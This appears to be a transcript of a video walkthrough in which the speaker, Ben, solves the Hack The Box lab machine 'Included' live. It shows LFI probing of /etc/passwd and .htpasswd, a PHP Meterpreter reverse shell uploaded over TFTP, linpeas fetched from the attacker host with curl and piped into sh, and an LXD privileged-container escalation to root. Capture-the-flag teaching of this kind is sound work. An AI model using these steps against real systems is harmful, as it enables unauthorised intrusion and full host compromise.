Hey guys, it's Ben here, and today we're going to be walking through, it's going to be a live solve of the included Hack the Box challenge. So this is part of the Starting Point series, and it's one of those walkthrough type boxes where you're given little hints or intermediary flags before you get to the user and root flags. So I've got the box up and running. I just need to connect to the VPN and get a folder for this. So let's just cd home Kali desktop Hack the Box, make directory included. Oh no, I am on the VPN. Never mind. I'll cd into included and get a nice terminal set up, like so. For some reason I can't type in that terminal. There we go. There we go. I'm going to make an mmap recon and exploits directory. I'm going to cd. I'm not going to cd into mmap, but yeah, I am going to start with a basic mmap scan. This is one second. This is a Linux box, so just keep that in mind. Yeah, I'm going to scan all the ports for a nice thorough scan, and then I'm going to output this to mmap initial.txt. And I'll do T4 just so we don't have to wait for too long. There we go. So the first flag is what service is running on the target machine over UDP. So obviously this isn't a this isn't a UDP scan. This is just a regular TCP scan covering all the ports. We've been told there isn't a UDP service running, so it's a good idea to do a UDP scan. UDP scans are a lot slower, so I'm going to, instead of doing all the ports, I'm just going to leave it at the top ports 500, just so it doesn't wait too long, and I'll call this one initial_UDP. While I need to be sudo to do that. While that one there is running, we now know there's a HTTP service, so I'm going to do a further mmap scan on port 80, and I'm going to do a bit of an aggressive one this time. So I'm going to do version service detection, I'm going to do TACSC for default scripts, I'm going to do operating system detection, and the host is that. I'm going to output this to nmap initial, no, sorry, not initial, thorough.txt. And once again, I need to be sudo Kali. I'm also going to add sudo vi etc hosts. I'm going to add this included.hackthebox into my etc host file. I don't know for sure that we'll be needing to use the domain, but in the majority of challenges I found it can be helpful, and it saves me forgetting the IP. So our Thorough nmap TCP scan has come back on port 80. Look, we can see it's an Apache web server, and there's this home PHP. It's best if we go investigate this ourselves. So let's just go to http included.hackthebox, and we've got this Titan Gears web page. So if you look at the web technologies, what can we see? It's using PHP in the back end. We've got this file equals home PHP, so that's sort of shouting out LFI. We can have a look at that in a bit though. I want to see if my UDP scan has come back. No, it hasn't. Is this taking time? Yeah, it's going to take its time. I'll have a look around on this web server and see. So if you look in the bottom right hand corner, you can see as I hover over each of these buttons, it redirects to just like a hashtag on the end. This goes nowhere, so all of these do nothing. And yeah, if we have a look at the source code, we can see this is just all lorem ipsum, and it's just a template really. So there's not much we can do here. This file equals home PHP is definitely interesting. If we take away that, it redirects to home.php. What if we add some sort of LFI and go to Etsy password? Does this return anything? And it does. So look, we've got LFI. We've discovered a local file inclusion vulnerability. So what is LFI if this is new to you? So basically, we the user have control over this get parameter file, right? We can the file get parameter in the back end loads a page based on so if it was home.php, there would be a home.php file in the file system which is loaded. When we can change this to what we want. If it's nothing, it looks like it redirects to home.php. We can choose the file in the file system it loads. So we can choose Etsy password and we get the password. So we can probably find some users here. Look, there's this Mike user. He's got a home directory. Which one has homes? So there's this syslog user. Yeah, there's this. The syslog user probably isn't a real user, but I guess the Mike user is definitely something to consider. That's a username we could use somewhere. But there is an attack we can do called LFI log poisoning. So as this is running PHP, right, we can view the Apache logs through this LFI. If we poison those logs to include PHP code, and I'll go on to how we can poison that in a sec. When we view the logs, we can execute that code. So let's just look. I think it may be. I'll see if I remember it. It could be in var log apache 2 access.log. Is this it? Okay, that's not what I wanted to do. Var log apache 2 access.log. This may not be the path we have to take, so it's just var log apache. It may just be apache. And do I have to go up a bit further? Okay, so maybe we can't see the log file. Maybe this isn't a log poisoning attack, and this does look empty. But it's interesting. If we just went to a random thing, do we also get an empty page? I want to see if this is the same behavior. Yeah. So it looks like when we go to a non-existent directory, we get this. So maybe the log isn't saved in Apache log. We saw that was that user syslog. So maybe that's something to do with it. I really don't know. Maybe they don't use the regular Apache logging. The port scan's still going. So that is definitely something to consider. Like we found this user Mike. Let's see if we can actually view the Etsy shadow. This will probably tell us we're probably getting a permission denied error, and it's not showing us it. There is other interesting information we can enumerate from this. So let's just search up LFI Linux interesting files. Hacktricks may have something on this. Here's some of the. Let's see if any of these work. Is there this error.log? It could also be in one of these other ones. I just want to find out where is this. That's not what I wanted to do. And is there a Apache.log like so? Nope. Just because if we did have log poisoning, then this would be quite this could be quite powerful. But it doesn't look like we can view the logs. Maybe I'm just not looking hard enough, but that's fine. Let's see if we can find some useful files we can dig into. So there's obviously the Etsy password. That is a good point. We could see if we could use any. There's other ways you can. We may be able to put like a PHP filter in here, like PHP, something like base64.encode, or is it filter base64.encode? Let's just see if this works. Resource equals ... Okay, so it has found this. Doesn't look like it's base64 encoded it. Oh, convert.base64 inc. Okay. Like so. Does this base64 encode it? Okay, it does. So we can use some PHP filters. What other filters can we use? Because there may be a chance we can, abusing these filters, get remote code execution straight away. It looks like there's no bypasses, so we don't have to do anything smart. We could try this one. Expect. Don't know if this will work. Doesn't look like it. We could obviously try this input one. If we've got a burp suite open. Yes, and we could also try other protocols. So we could see, look, can we, if we did like localhost, for example, does this work? Okay, can I call out to a remote host? So for example, can I, in one of these down here, go Python tacm HTTP server? Can I call out to 10.10.16.31 and there's 1, 2, 3, 4 test.html? That is really annoying. HTML. Does it make a GET request? Doesn't look like it. And did I use it right? 10.6.31, 1, 2, 3, 4. Okay, never mind. That's fine. What was the next flag? What service is running over the target machine over UDP? Okay, so it looks like we've returned a lot of services which are open/filtered. We don't know for sure. Maybe it was the T4 which made it a bit inaccurate. Let's have a look at TFTP. was right. Okay. I sort of cheated there a little bit. I noticed the TFTP ended in P and the flag ended in P. So what class of vulnerability is the web page that is hosted on port 8 vulnerable to? That would be local file inclusion. We discovered that inclusion. We discovered that a bit earlier. What's the default system folder that TFTP uses to store files? TFTP default file location Linux. So if well, the default is varlib tftp root. Is that the answer? I'm pretty sure TFTP doesn't use any authentication, so we could try TFTP root. Is that right? This. Let's see if we can connect to TFTP. So TFTP over UDP. I want to know if there's a, because I know you can go TFTP for example and then specify the IP 10.129.129.11.166, right? There was this home.php. I wonder if this is located on there. File not found. Can I do get all? File not found. Okay. Am I actually connected? That's what I'm interested. Can I get set on verbose? The verbose mode. And can I see if we're connected? If I just try get home.php, does this give any more information? Oh, so it does. Getting from. Let's just exit this. Man TFTP. So connect with IP4 only. Now, is there a UDP version? It doesn't default use UDP, right? Oh, so I need to. Yeah, I didn't even specify the port, right? I think it was 69, but let's cd into mmap cat initial. Yeah, it was tftp 10.129.11.166.166.69. Get home.php. Okay. Oh, okay. It does use UDP as the default port, so we didn't need to. We don't need to specify a flag. That's fine. Does TFTP have a list command, or has it only got get and? let's go back to here. I want to see if I can. Let's just quit out of this. Oh no. File. It's empty. Remove. Clear that up a bit. Let's try follow these flags. One sec. So it's saying what is the default system folder that TFTP uses to store files. And was it? Yeah. So okay. I will have to Google this one, but we'll try find it. TPFP boot, not TPFP root. That is something I did wrong. Var lib tfpt boot. Trivial file transfer protocol. There we go. Okay. Which interesting file is located in the web server folder that can be used for lateral movement? So I'm guessing well, we could obviously try I'm guessing the TFTP server is storing the stuff on the web server, storing the files for the web server, perhaps. Let's see if there's a TFTP file brute force. Oh, is there already a let's just see if there's a Metasploit module for this already. Use 9 perhaps. Just move this across. Show options. So set R hosts to be, what is the R hosts file? So because if you've ever used FTP, there's a ls, you can list the files in the directory. TPFTP doesn't have that feature, so you can try sort of take a rough guess of the contents of the file by brute forcing a file and trying to find out if it contains it. So let's just run this. I'm going to use Metasploit's default TFTP word list. And that didn't return anything. Let's just see what is contained in this word list. And have I done it right? Okay, let's just cat user share Metasploit framework data word lists. Okay, so it does contain files, right? Not a lot, but it seems not to show advanced options. Is there some verbose mode? Set verbose to true. This doesn't seem to be working or running, returning anything, which was alright. I'm sure there's another tool for this. See how they use it. Rapid7 is probably the same, yeah, as the Metasploit module. Let's just try this. I'll cd into the recon directory actually. Git clone. We could probably just try to do this manually at the time I've done this, but gftp theft Python finder. So port 69, and do we need to specify a file type, or does it have a word list somewhere? Or is that in the data folder? It's got a word list. File not found. Okay. Let's go back to the box. Let's see if I'm missing anything. So what interesting file is located in the web server folder, which is used for lateral movements? We can see it begins with a dot. This is like a hidden file. We could try brute force this actually. One sec. We could try fuzz using a word list of common file names. We could try fuzz this and see if we can find anything in the web server folder, right? That's the next thing I can think to try. So let's move this along. Just okay. So I'm gonna use fuff word list user share word lists sec list. Let's just go down here. I want to find the right word list to use. So we'll be fuzzing. Is there one in there? Nope. How about in discovery? CD file system. Common, and does this. Okay, so it doesn't have like it could have an extension, but I don't think that would. Let's just try one of these, right? Sec lists, and then what we'll do, get rid of this. What did we call it? It was included. Dot hat the box, and then we're gonna dot fuzz, right? I'm not gonna filter code by 404, and I'm gonna get rid of this just to start. because if you do like a random thing, this will just return empty, right? If I did this, come on. If I did not this, just like a random, yeah, it returns nothing. So I can filter by code 0. I just want to check this works first. And then I could do directory list, I could do common, I could do big. Let's just start with this actually. See if this word is discovered. And I want to see, this should be returning, all of these are size 0, right? So I'll leave it just to go, just to be sure. Okay, so that one there is size, yeah, the majority of these are size 0, so I'm going to filter by size 0. So it's found this .html tutor, and it's finding these other ones with these errors, which I don't think this is genuine. They're all given that same. So what if I went to yeah, it's finding a lot of, I don't think, useful stuff, right? .html. Oh, it's just finding the file names, so that's, yeah, is that, it is given 0 bytes. Why is it saying it as a size? Have I done the fuzzing right? Filter by size. What if I do filter by word? Filter by size 0, filter by word 20. This doesn't look like it's going to return anything, which is fine. Try a different word list. I can try, for example, if I go down here, what common, so those all include PHPs on the end, right? I'm pretty sure this is, I mean, we can try both. I don't know if it's ending in a .php or not, but I don't think it is. We can try that one. Common, no, what am I doing? Fuzz like this. Get rid of this one here. Common, PHP file names. Oh, I just want to see if I get rid of this word count and just filter by size. So it does find stuff. It finds like aindex.php, .htaccess, but these are all giving. These aren't really there, right? If I did htaccess.php, and if I did, so I don't know where it's getting that error from. Am I passing it in the file parameter? Am I even? Oh shit! That's why that is. I was doing it totally wrong. So it's like this. I wasn't even doing LFI. I bet the guys at home are shouting at me after realizing that. I'll try this big directories one again and see if I catch anything now. Big.txt, directory list one. looks like it's not going to find anything, which is fine. I just want to check the head directory list. It doesn't include any. Okay, it's just the words, that's fine. Oh, there's a tftp.fuzz.text. We could obviously try that. Let's just cut out tftp.fuzz. Let's see. Okay. Is this the one it just uses? I think it's the one it uses in Metasploit. Now I'm going to try the PHP ones. Common PHP file names. Try that, and then down here I'm going to get. So I'm going to cut out common PHP file names. I'm going to. Let me just tell this. Head n1 common. So if I go cut was it like cut and go F1. Okay, so if I do that, can pipe this into common PHP file names without .php.text. Why can't I do this? If I just did this and didn't pipe it right, I would still be able to get the list, right? Yeah. But I don't want to copy that. Okay. Where am I not looking? To be honest, I didn't thoroughly look the TFTP route. I could try that because I reckon that may be the way. I just want to have a look. Can I run it in verbose mode? Yeah. TFTP verbose. The IP is 10.10.16.31 and the port is 69. I've connected. Okay, so I have connected. That is something which didn't show before. So I should be able to brute force it, right? Let's just see how this actually works. Okay, it's quite big. TFTP enumeration. Okay, so there is an mmap module for it, as the one I was doing wasn't working. Let's try that as well. This is. Do we have to supply a word list? Or it just used that like default one, right? Nmap pn sudo port 69 script tftp enum 10.10.16.31. That should be good to go. I need to be sudo. And it is saying it's closed because that is my IP, not the box IP. And the same with this. This is my IP here, so why is it connected? What? TFTP verbose 10.129. I wasn't doing. I can just sort of do included out of the box, so I don't have to remember it on port 69. There you go. Included out the box. Out the box. I'll let that do its thing. Hasn't run the script. If I do it in verbose mode, does it even try? Or is it just not found any of the files? And what was it? Can we make a guess? Dot protected. File not found. Tell you what, I'm going to go for a hint. There's nothing wrong with using a hint. The file can be used for basic HTTP authentication. Okay. The file can be used for basic HTTP authentication. HTTP authentication file. Oh, it's the .ht password. Why didn't I think of that? Or .ht access. Yeah, it won't be that. It must be get.ht access. Is this even working? Maybe one of my get.ht password file not found. Verbose is on. It is get, right? And just to check, if I went like this, .ht password, I should get a 404 error, right? Oh, fuck's sake. Sorry. I don't want a .php. .ht access, so that works. And if I did .ht password, oh, you can find it on here. It's not via TFTP. Okay, that's why. So that's the basic HTTP access. There wasn't an SSH port, so let's just go back to this challenge here. Let me just refresh this because I've done these. .ht password. What group is Mike part of and can be exploited for? Okay. Let me just go back to the port scan and cd cat initial, the initial.txt. There wasn't an SSH port we can use these credentials with. Is there some sort of like login.actbox? Is this sort of some admin page or a login.php? What about if we go to don't understand where we're required to use these credentials, because TFTP, right? That doesn't use any credentials. It's like an insecure protocol. You don't need to authenticate. But it says in that hint we looked at, it said it's used for HTTP, like the basic authentication. But I don't see where on this website. This is annoying me. HTTP included box. Let's clear this up a bit. Let's just have a look. Did my directory scan find anything? Actually, that's probably a better way to look at. Or did I even, in a recon, did I do? I guess I didn't actually do a normal directory scan. I just jumped straight in because I saw that LFI. Let's do that. Let's now actually do a normal directory scan and filter by code 404 fuzz, and we'll tee this into fuff_log, and we'll change this to be web content directory 1.0, like so. And that isn't finding much, if anything. I sort of wanted, let's just get this sorted out so I have a better view. Let's do this again here. And then down here I'm going to that wasn't the command I used, right? No, that was right, sorry. There's this images directory. I don't think this is anything. I guess this is just holding the, yeah. I can obviously try the big one here. Big.txt. So yeah, it's found those two files, htaccess and htpassword. It's found fonts, it's found images, it's found server status. Obviously that's going to be a permission error one, right? Server status. Can I bypass this by supplying credentials? I don't think so. I can't. And on the website, was there any other? Can't lie, I'm a little bit stumped here. Let's go back and fuzz this files parameter here again without that, because last time I did this dot at the beginning. Files equals fuzz. I'll try this. Big, and then I'll just try that. Yeah, files.txt. Okay, and then all of those are size, so filter by size 0. Sorry, yeah, that's not going to go there. Filter by size 0. it's all returning 0. Interesting. What can I do from here? So let's just look. Let's see if we can get a hint from the actual. So yeah, clear text credentials. I found that arbitrary file. Oh, TFTP. If I try actually upload a file now, so let's recon. Let's vi test.txt. Hello world. So we've got this test.txt. Let's see if we can put test.txt. That looked like it worked, right? Put test.txt. Okay, so if I go to here, can I now see it here? Can I see it here? No URL was found. It's definitely putting it there. I just want to know the file location. Oh, is the TFTP? Oh, yes, I've realised. It's all coming together now. So if I go to, if I use LFI here to go to var, what was it, lib tftp boot. Yes. Okay, so we can put a PHP file here. We can get a PHP reverse shell, and we're in. Okay. Sorry for being a bit slow on this one, guys. It's nearly an hour, and I haven't even got initial access. So I'm going to generate a PHP meterpreter shell. So meterpreter reverse TCP lhost is 10.10.16.31. L port is 1234. The file type is going to be raw. I'm going to output this as revshell.php. And then I'm going to actually copy. I'm going to remove this home.php. I don't like this being here. Is this the. Yeah, I'm going to remove this home.php. I'm going to move revshell. I'm going to move revshell.php into the exploits directory. I'm going to cd into exploits directory. I'm going to open MSF console here. I'm going to get TFTP on 10.129.11.166.166.99 on port 69. To be honest, unknown host. That's because I did totally wrong. Quit. TFTP included .hat the box on 69 verbose mode. Put revshell.php. Done. Use MSF use multi-handler, multi-handler, set payload to be PHP, meterpreter, reverse TCP, set L host to be 10.10.16.31, set L port to be, what did I use? One, two, three, four. Run. That's uploaded, so I can now go to revshell.php. That loads. I've got my interpreter session. I can pop a shell. Okay, nice. Took about time. I don't know how long this video is going to be, but it'll probably be a long one. So where were we at? What is the group that the user Mike is part of can be exploited for privilege escalation? So we've got these credentials for Mike, right? Can we, first of all, let's see if we can get a import pty.spawn. I like a nice pretty shell. bin/bash. Does it have Python 3? Do you want to be nice to me? And it does. We'd like to see that. Let's see if we can sudo. No, we can into the mic user, and then let me just grab the password. If I go like this, is it going to drop the Meterpta shell? Doesn't look like it. Let's see if we can get the HD. Was it like this? File. Was it .hd password? Was it here? Oh no, it's file equals Sheffield 19. Copy that across. Authentication failure, so that's not his password. It's just seeding the home directory, right? So there's the mic direct. Did I put a space there? Okay, never mind. So the user.txt flag will be in here. If you just look at this, ls, take LA. Yeah, only Mike has read access on that. Okay, so let's just do some basic enumeration. Do I have any sudo capabilities? I don't know the password for www user. Just out of chance, is it this? I doubt it will be. Nope. Okay. Is there any suid binaries which are perhaps owned by Mike? Find type file name type file perm u equals s dev no. And there was one, I'm pretty sure if you look, what is the group that the user mic is part of and can be exploited for privilege escalation? Okay, so we may have to look for SG binaries, set group binaries. Do I notice anything I can abuse here? Not at first sight. If I cat etc hosts, is there any other? Nope. Password pkexec pocket. Just seeing if there's any of these. I'm pretty sure these are all fairly safe. Is there any unknown things in the root directory? Looks about right. If I go into opt, is there anything installed? Nope. Okay, I may have to get out my. Well, it does ask us what group is the user mic. Is there a way to enumerate groups on Linux? I just want to see when I did this. Yeah, this is TFTP user, right? And there's this LXD. If you cat, is this etc groups? This one? No. So it's some sort of containerization. The reason I mentioned that is because I saw earlier that this uses LXD and there's this LXD user account. So I thought this may be used somewhere. And if I it is possible you can use this for privilege escalation. Exploit without the internet. Okay. Let's just see if this is the way, right? Let's take a guess that this is right. It is, okay. When using an image to exploit a system via containers, we look at for a very small distribution. Our favorite for this task is named after mountains. What distribution is this? Okay, small Linux distribution. So this is a totally new Privesca Arcban. This is a totally new Privesc method for me. I haven't seen this before, so this will be a bit of a learning. Slacks, Ubuntu Mate, Xubuntu, Linux Mint, Peppermint, Lubuntu, Linux Lite. What was it? Named after mountains. Alpine Linux. Lightweight Linux distro. So is this what this is? Have they used this here? Oh, they have. Okay. So how does this actually work? If you belong to the LXD or LXC group, you can. Oh, okay. So this is. I guess I'm not part of this group, but Mike is. So yeah, I'm not part of it. What group? Okay, so I guess we still need to get to Mike first. What group that user Mike is part of and can be exploited for privilege? I just want to see, was there any SSH keys? Did I miss that when I did it originally? There wasn't. Do I have read access on any of these? If going .local, cd.share, cat. Oh, I don't have access to that. It may be worth getting limpies in just because that's all I can really think to do at the moment. I've noticed Terminator doesn't run limpies that well. It takes up like all of the screen, it doesn't load it, so I'm going to use it in the normal one here. I am just going to exit this. I'm going to quit out this, terminate, yes. Get rid of that. Maybe it'll be able to find some file locations for me. NSF console. Use multi handler. Set L host to be 10.10.16.31. Set L port to be 1234. Set payload to be PHP interpreter _ reverse TCP run, and we'll get this back open again. HTTP included, and that's going to be varlib. What was it? TFTP boot revshell.php. There we go. Shell python 3 c import pty.spawn bin bash, like so. Nice. Oh yeah, limpies. So let's move that across there. Let's just exit this, right. Let's do it here, actually, we've got some space. cd home Kali desktop, useful files to center box, Python tac m http server 4321, port 123 is taken. Right, let's go to a file I have write access to. Let's clear export term equals xterm clear. Let's curl this onto the box 10.16.3 4321 limpies.sh. Curl http 10.10.16.31 4321 limpies.sh, and we'll output that as limpies. I'll just pipe this into sh. This should do it right. There you go. So, what can we find? Oh, there is this version here vulnerable to I know there is a, oh, it was this one here. Oh no, maybe that does work. I'll try that in a sec, because that is possibly a privilege escalation vector. Let's carry on going and see what else we find. I've noticed kernel exploits don't always work as well. All users and groups. Okay, so yeah, there's obviously the root. And is this LXD group in here somewhere? Yeah, it's here. Oh, it says it's no group. But is this mic user? Where is this mic user? Yeah, it's part of the LXD group, right? So maybe that I can use that to privilege escalate to root. I don't know where this I haven't used this password at all, so it really makes me think that this is the password for Mike. I did try that, and I'm going to try it again, but I'm sure when I did this earlier, I'm going to go back and watch this. I'm sure when I tried to privilege escalate to Mike with this password, it got me permission denied. Now it's working. That is strange. Okay. So let's try, because we're now as Mike. We can now try this LXD to privilege escalate. You can install in your machine this distro builder. Right. Then upload to the vulnerable files LXD. What does it say? Let's just go Alpine. What flag do we set to the container so it has root privileges on the host system? So you add this image, right? And this is Alpine. And create container and add a root path. Build an Alpine image and start it using the security privilege true, forcing the container to interact with as root with the host system. Security.privileged equals true. If the root file system is mounted at MNT, where can the root flag be found on the container after the host system is mounted? Oh, I see what we're doing. So we're creating this lightweight container basically, and we're mounting the host system's file system onto it. Okay. So git clone a simple Alpine binit. So if we wanted to, this would be mnt root, right? To be this. Okay. And then let's get the user flag. We're Mike now, so we can get this. So cat user.txt. And now let's get the root flag. So I'm guessing this doesn't have Git on it, right? It does have Git, but I'm guessing it doesn't have an internet connection. If not, that's fine. I can clone it on my host box and transfer it. Yeah, that's fine. What I'll do here is exit, quit. I'm gonna go out of here, cd into exploits. I'm going to git clone this here. And I'm going to start a python.m/http server on 99999. Nice. And then I'm going to now wget this as wget right, wget http 10.10.16.31 LXD Alpine builder. So if I clear this, I've got that LXD Alpine builder like I should. I'm going to cd into it, and then I'm going to use this command here. I don't have sudo privileges, right? Will that work? I mean, we can always try. Let's copy this command here. You need to actually cd into. That's going to give an error. Cd into L. Oh, I don't like this terminal tool. Cd into LXD Alpine builder. Is it what? Oh, it's not transferred as a directory. That's annoying. Let's remove LXD Alpine builder. How do I get it to transfer as directory? Did I? Let me try this again. Shit, how do I... If I just go onto it on this side, actually. Okay, there's only file build. Okay, so I guess I could actually... This is going to be a bit annoying, but it should work right. Let's just get these two together here. Move this one across. Curl this one on. There we go. Build Alpine. That's the only one else I need to do right. I think that should be sufficient, right? And then we'll go on to here and have a look what we have to do again. Let's see if this works. Was it Sheffield 91? What was it? Varlib tftp boot. No, it's not even here. What am I on about? It's the HT password. .ht password. Sheffield 19, it was that. Can I just go like this then? I686. Permission denied. What? Oh, I totally misunderstood this, right? You have to do this on your host machine. Build Alpine Kali. Oh, and then it will generate this one. Okay. On the other hand, we will download the Alpine image. Okay, yeah, that makes sense. Okay. Okay. So I don't have to build up my host machine. That just generates this one here, and I have that there. That's the tar.jzip file, right? So let me just lxc image import, and then you'll do this one here. And then if we go lxc image list, okay, so it has found it there, right? So I need to do it like this. Okay. I don't have an alias for it, but oh, I should have done. How do I remove? I don't. lxc image delete. Okay, fuck's sake. I don't know what the alias for it is, so I can't lxc init. My image is called. Let's just Alpine ignite security.privileged equals true. I didn't set an alias for it here. Did they? Is that on the other side? Oh, I'm being stupid here. LXC delete image without alias. This is annoying. I could obviously try it with a different name, or I could. I'm making this a lot harder than I need to be, right? There is this one here which is slightly different, right? It's a bit earlier. If I go Python 999 and then go wget http 10.10.16.31 9999. Done. I'm not going to mess this one up now, right? I cannot mess it up. LXC init my image. No. LXC import. I'll use this one here. Okay, so LXC image list. Okay, so my image is there, so I can now LXC init my image ignite security.privileged equals true, right? Privileged equals true. Yes, that's good. LXC config device add ignite my device disk source equals path equals mnt root. Just want to check what this one's doing. And then recursive. Recursive equals true. Yep, nice. LXC start ignite. Okay. LXC exec ignite bin sh. Okay, is this okay? Did I not import it correctly? Correctly? cd into home ls. Oh, come on. If I go into cd into what? What did I do wrong here? I just want to check it's not here before I permission denied. It's not here, is it? Fuck's sake. How do I exit? LXC image delete my image. Okay. LXC image list. What did it say? When looking for an oh oh maybe I was looking in the wrong place for the flag. Shit. I'm really not having a good day with this. LXC import, but I'm not going to give up because I'm close. Nearly 2 hours on. Okay, let's try this again. Let's try this again. Let's try this again. Oh, can I delete the image, but I didn't. Can I just try this again and look in the right directory? Oh, there is this. Oh, okay. Yeah, I didn't do it wrong. I was looking in the wrong place. There we go. Done. That has been a hard challenge. If I didn't have those hat the box hints, I definitely wouldn't have been able to do that. If you stuck around for this whole 1 hour 30, I feel sorry for you because you've watched through a lot of my suffering here, but I mean, we got there in the end, so yeah, I hope you've enjoyed, and I'll see you on the next one.